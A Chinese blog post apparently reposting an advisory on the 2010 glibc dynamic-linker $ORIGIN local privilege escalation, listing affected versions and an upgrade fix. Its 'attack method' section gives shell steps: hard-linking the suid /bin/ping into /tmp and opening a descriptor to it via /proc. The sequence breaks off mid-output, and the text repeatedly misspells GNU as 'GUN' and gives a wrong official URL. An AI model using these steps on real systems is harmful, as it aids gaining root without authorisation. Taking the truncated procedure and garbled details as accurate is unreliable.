GUN glibc动态连接器$ORIGIN本地权限提升漏洞

<strong>一、影响范围<br />

发布日期:2010-10-18<br />

更新日期:2010-10-20

受影响系统:

GNU glibc 2.5
GNU glibc 2.12.1

注:该漏洞发布有一年多的时间了,不过真正修复的机器估计很少。受影响的范围也很广,只有有使用GUN glibc的类linux系统都会中招。

<br />



<strong>二、攻击方法</strong>



<br />
# 在/tmp下创建可控制的目录
mkdir /tmp/exploit
# 链接到suid二进制程序以更改ORIGIN的定义
ln /bin/ping /tmp/exploit/target
# 打开到目标二进制程序的文件描述符 exec 3< /tmp/exploit/target
# 现在可通过/proc访问描述符
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 ->
<br />
修复方法:升级glibc包。glibc官方主页:www.gun.org
<br />

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注